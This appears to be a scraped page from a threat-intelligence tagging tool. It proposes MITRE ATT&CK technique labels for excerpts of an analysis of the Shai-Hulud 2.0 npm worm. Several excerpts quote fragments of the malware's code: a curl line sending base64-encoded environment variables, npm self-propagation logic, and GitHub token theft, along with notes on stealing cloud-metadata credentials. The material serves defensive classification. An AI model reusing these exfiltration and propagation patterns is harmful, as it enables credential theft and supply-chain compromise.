T1195.001Compromise Software Dependencies and Development Tools
99%
"contents of the first file is hardcoded, the malware reads itself in order to write the second file. - recreating a tarball for the backdoored package - running npm publish to publish the backdoored package. async function propagatevianpm ( npmtoken ) { let injector = new npmback…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1195.001Compromise Software Dependencies and Development Tools
99%
"github users was successfully exfiltrated, belonging to over 150 unique github organizations. this should be interpreted as a lower bound. - the last affected package we have witnessed was published at 6 p. m. utc on november 24, indicating that npm may have taken measures to pre…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1195.001Compromise Software Dependencies and Development Tools
99%
"- credentials - d creds = ` env | base64 ` self - propagation to npm by backdooring legitimate packages finally, the self - propagating behavior of backdooring npm packages is worth mentioning, because few pieces of malware exhibit this behavior. if the malware finds an npm token…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1195.001Compromise Software Dependencies and Development Tools
97%
"hours preceding the publication of this post. in addition, github archive enabled us to identify a potentially suspicious pull request from a github repository that was taken down shortly before the attack began. this user has been taken down, and had no activity besides a pull r…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1195.001Compromise Software Dependencies and Development Tools
95%
". log ( " npm token validation failed " ) ; } return { npmusername : username, npmtokenvalid : tokenvalid } ; } here ' s a sample sequence of the api calls performed to https : / / registry. npmjs. org : get / - / whoami get / - / v1 / search? text = maintainer % 3acompromiseduse…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1195.001Compromise Software Dependencies and Development Tools
93%
"the shai - hulud 2. 0 npm worm : analysis, and what you need to know key points and observations in september 2025, a self - replicating npm worm known as shai - hulud was identified, backdooring hundreds of legitimate npm packages. - on november 24, 2025, the community identifie…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1195.001Compromise Software Dependencies and Development Tools
90%
"if your environment is affected. several vendors in the industry have reported on this campaign. however, each vendor is sharing their own list of affected npm packages. in addition to affected npm packages datadog was able to manually validate were affected, we are sharing a ded…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1195.001Compromise Software Dependencies and Development Tools
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1587Develop Capabilities
86%
"- credentials - d creds = ` env | base64 ` self - propagation to npm by backdooring legitimate packages finally, the self - propagating behavior of backdooring npm packages is worth mentioning, because few pieces of malware exhibit this behavior. if the malware finds an npm token…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1195.001Compromise Software Dependencies and Development Tools
83%
"writing, we also believe that the attacker hasn ' t exploited the command - and - control channel they set up through self - hosted runners on compromised machines. future usage is likely to show up in the results of the following query : select * from ` githubarchive. day. 20251…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1195.002Compromise Software Supply Chain
82%
"##cee196fafaa0e9874e17b24ac053c02 9d59fd0bcc14b671079824c704575f201b74276238dc07a9c12a93a84195648a e0250076c1d2ac38777ea8f542431daf61fcbaab0ca9c196614b28065ef5b918 a note about the root cause of the incident according to aikido ' s charlie eriksen, " patient zero " is a malicious…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1587Develop Capabilities
76%
"github users was successfully exfiltrated, belonging to over 150 unique github organizations. this should be interpreted as a lower bound. - the last affected package we have witnessed was published at 6 p. m. utc on november 24, indicating that npm may have taken measures to pre…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1587Develop Capabilities
69%
"contents of the first file is hardcoded, the malware reads itself in order to write the second file. - recreating a tarball for the backdoored package - running npm publish to publish the backdoored package. async function propagatevianpm ( npmtoken ) { let injector = new npmback…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1552.005Cloud Instance Metadata API
63%
". config / gcloud / application _ default _ credentials. json - downloading and using trufflehog to actively hunt for secrets - calling the instance metadata service in aws, azure, and google cloud, to steal temporary workload credentials in a way that supports not only classic v…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1195.001Compromise Software Dependencies and Development Tools
62%
"and matches them against known malicious packages from public sources and our own malicious - software - packages dataset. datadog workload protection can also identify malicious behavior at runtime, including using customized rules that are specific to malicious software package…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1528Steal Application Access Token
57%
"; } let parseddata = json. parse ( decodedcontents ) ; let stolentoken = parseddata?. modules?. github?. token?. trim ( ) ; if (! stolentoken | | typeof stolentoken! = = ' string ' ) continue ; / / validate the stolen token if ( ( await new this. octokit. constructor ( { auth : s…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1567.001Exfiltration to Code Repository
53%
"the cloud environment ( aws, google cloud, azure ). - exfiltrate harvested credentials to a public github repository with a description set to sha1 - hulud : the second coming.. - set up a github self - install worker on the compromised machine, so the attacker can use github - n…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1027Obfuscated Files or Information
52%
"##77881ccd2071446dc3f65f434669b49b3da92421901a - observed hashes for the malicious file bun _ environment. js 62ee164b9b306250c1172583f138c9614139264f889fa99614903c12755468d0 cbb9bc5a8496243e02f3cc080efbe3e4a1430ba0671f2e43a202bf45b05479cd f099c5d9ec417d4445a0328ac0ada9cde79fc374…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1567.001Exfiltration to Code Repository
51%
"##ltrated through the user of another compromised github account. to get a sense of the overall impact from this campaign, the gharchive dataset continuously scrapes the github events api and makes the resulting files available in csv, or through google bigquery. this allows to q…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1195.001Compromise Software Dependencies and Development Tools
51%
"##cee196fafaa0e9874e17b24ac053c02 9d59fd0bcc14b671079824c704575f201b74276238dc07a9c12a93a84195648a e0250076c1d2ac38777ea8f542431daf61fcbaab0ca9c196614b28065ef5b918 a note about the root cause of the incident according to aikido ' s charlie eriksen, " patient zero " is a malicious…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1528Steal Application Access Token
51%
"authenticated, try to steal tokens from existing repos if (! githubexfiltrator. isauthenticated ( ) | |! githubexfiltrator. repoexists ( ) ) { let stolentoken = await githubexfiltrator. searchforexistingtokens ( ) ; if (! stolentoken ) { if ( npmtoken ) { await propagatevianpm ( …"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1059.004Unix Shell
34%
"github action purposely vulnerable to command injection. await bun. $ ` mkdir - p $ home /. dev - env / ` ; await bun. $ ` curl - o actions - runner - linux - x64 - 2. 330. 0. tar. gz - l https : / / github. com / actions / runner / releases / download / v2. 330. 0 / actions - ru…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1555.006Cloud Secrets Management Stores
33%
". config / gcloud / application _ default _ credentials. json - downloading and using trufflehog to actively hunt for secrets - calling the instance metadata service in aws, azure, and google cloud, to steal temporary workload credentials in a way that supports not only classic v…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1204.005Malicious Library
30%
"- credentials - d creds = ` env | base64 ` self - propagation to npm by backdooring legitimate packages finally, the self - propagating behavior of backdooring npm packages is worth mentioning, because few pieces of malware exhibit this behavior. if the malware finds an npm token…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.